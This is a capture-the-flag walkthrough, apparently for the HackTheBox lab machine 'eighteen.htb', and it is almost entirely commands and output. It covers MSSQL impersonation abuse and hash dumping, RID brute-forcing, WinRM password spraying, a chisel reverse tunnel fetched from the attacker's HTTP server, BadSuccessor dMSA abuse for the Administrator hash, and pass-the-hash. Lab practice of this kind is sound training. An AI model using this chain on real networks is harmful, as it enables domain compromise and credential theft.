1/ Initial Enumeration
1.1 Nmap scan
1
2
3
4
5
6
7
8
9
10
| nmap -sC -sV -Pn [IP] -oN /tmp/htb_10.129.2.72_initial.nmap
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
1433/tcp open ms-sql-s Microsoft SQL Server 2022 16.00.1000.00; RTM
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
ms-sql-ntlm-info:
DNS_Domain_Name: eighteen.htb
DNS_Computer_Name: DC01.eighteen.htb
|
1
| echo "[IP] eighteen.htb dc01.eighteen.htb" | sudo tee -a /etc/hosts
|
2/ Web App + MSSQL Discovery
2.1 Register/login functionality
1
2
3
4
5
| curl -s -i -H 'Host: eighteen.htb' -X POST http://[IP]/register \
--data 'full_name=Test User&username=testuser123&email=test123@mail.com&password=Test123' | head -n 20
curl -s -i -H 'Host: eighteen.htb' -X POST http://[IP]/login \
--data 'username=testuser123&password=Test123' | head -n 20
|
2.2 SQL service brute/spray and valid credential
1
2
3
| netexec mssql [IP] -u kevin -p 'iNa2we6haRj2gaw!' --local-auth
[+] DC01\kevin:iNa2we6haRj2gaw!
|
3/ SQL Privilege Escalation Inside DB
3.1 Identify impersonation edge
1
2
3
4
5
6
7
8
9
| printf "select b.name as grantee, c.name as grantor, a.permission_name,a.state_desc \
from sys.server_permissions a \
join sys.server_principals b on a.grantee_principal_id=b.principal_id \
join sys.server_principals c on a.grantor_principal_id=c.principal_id \
where a.permission_name='IMPERSONATE';\nexit\n" | \
impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@'[IP]
grantee grantor permission_name state_desc
kevin appdev IMPERSONATE GRANT
|
3.2 Access application DB as impersonated principal
1
2
3
4
5
6
7
8
9
10
11
12
13
| printf "EXECUTE AS LOGIN='appdev';\nuse financial_planner;\nselect table_name from information_schema.tables;\nselect top 20 username,password_hash,is_admin from users;\nexit\n" | \
impacket-mssqlclient 'kevin:iNa2we6haRj2gaw!@'[IP]
table_name:
users
incomes
expenses
allocations
analytics
visits
username is_admin password_hash
admin 1 pbkdf2:sha256:600000$AMtzteQIG7yAbZIa$...
|
4/ Pivot to Domain User Credential
4.1 Enumerate domain objects through MSSQL-authenticated RID brute
1
2
3
4
5
6
7
8
9
| netexec mssql [IP] -u kevin -p 'iNa2we6haRj2gaw!' --local-auth --rid-brute 5000
1606: EIGHTEEN\jamie.dunn
1607: EIGHTEEN\jane.smith
1608: EIGHTEEN\alice.jones
1609: EIGHTEEN\adam.scott
1610: EIGHTEEN\bob.brown
1611: EIGHTEEN\carol.white
1612: EIGHTEEN\dave.green
|
4.2 Password spray to WinRM
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| cat >/tmp/domain_users.txt <<'EOF'
jamie.dunn
jane.smith
alice.jones
adam.scott
bob.brown
carol.white
dave.green
mssqlsvc
EOF
netexec winrm [IP] -u /tmp/domain_users.txt -p 'iloveyou1' -d eighteen.htb --continue-on-success
[+] eighteen.htb\adam.scott:iloveyou1 (Pwn3d!)
|
5/ User Flag
1
2
3
4
| printf 'whoami\ntype C:\\Users\\adam.scott\\Desktop\\user.txt\nexit\n' | \
evil-winrm -i [IP] -u adam.scott -p 'iloveyou1'
eighteen\adam.scott
|
6/ Root via BadSuccessor (dMSA) Abuse
6.1 Tunnel setup (attacker)
1
2
3
| # HTTP file host
cd /tmp
python3 -m http.server 9001
|
1
2
| cd /tmp
./chisel_linux_arm64 server --reverse -p 8000
|
6.2 Transfer and run chisel client from compromised host
1
2
| printf 'iwr -UseBasicParsing -Uri "http://'$LHOST':9001/chisel_windows" -OutFile "chisel.exe"\nexit\n' | \
evil-winrm -i [IP] -u adam.scott -p 'iloveyou1'
|
Run client from WinRM shell:
1
2
3
| .\chisel.exe client 10.10.14.87:8000 R:socks
session#3: tun: proxy#R:127.0.0.1:1080=>socks: Listening
|
6.3 Route LDAP/Kerberos via proxychains + run bloodyAD
Create proxychains profile:
1
2
3
4
5
6
| cat >/tmp/proxychains_chisel.conf <<'EOF'
strict_chain
proxy_dns
[ProxyList]
socks5 127.0.0.1 1080
EOF
|
Sanity-check LDAP through tunnel:
1
| proxychains4 -f /tmp/proxychains_chisel.conf -q timeout 8 bash -lc 'cat < /dev/null > /dev/tcp/10.129.2.72/389' && echo OPEN
|
Run badSuccessor:
1
2
3
4
5
6
7
8
9
10
| proxychains4 -f /tmp/proxychains_chisel.conf ~/.local/bin/bloodyAD \
-d eighteen.htb -u adam.scott -p 'iloveyou1' -H 10.129.2.72 -i 10.129.2.72 \
add badSuccessor --prepatch websvc2
[+] Creating DMSA websvc2$ in OU=Staff,DC=eighteen,DC=htb
[+] Impersonating: CN=Administrator,CN=Users,DC=eighteen,DC=htb
[+] dMSA TGT stored in ccache file websvc2_Rd.ccache
... dMSA previous keys found in TGS ...
RC4: 0b133be956bfaddf9cea56701affddec
|
6.4 Pass-the-hash as Administrator over WinRM
1
2
3
| netexec winrm [IP] -u Administrator -H 0b133be956bfaddf9cea56701affddec -d eighteen.htb
[+] eighteen.htb\Administrator:0b133be956bfaddf9cea56701affddec (Pwn3d!)
|
Read root flag:
1
2
3
4
| printf 'whoami\ntype C:\\Users\\Administrator\\Desktop\\root.txt\nexit\n' | \
evil-winrm -i [IP] -u Administrator -H '0b133be956bfaddf9cea56701affddec'
eighteen\administrator
|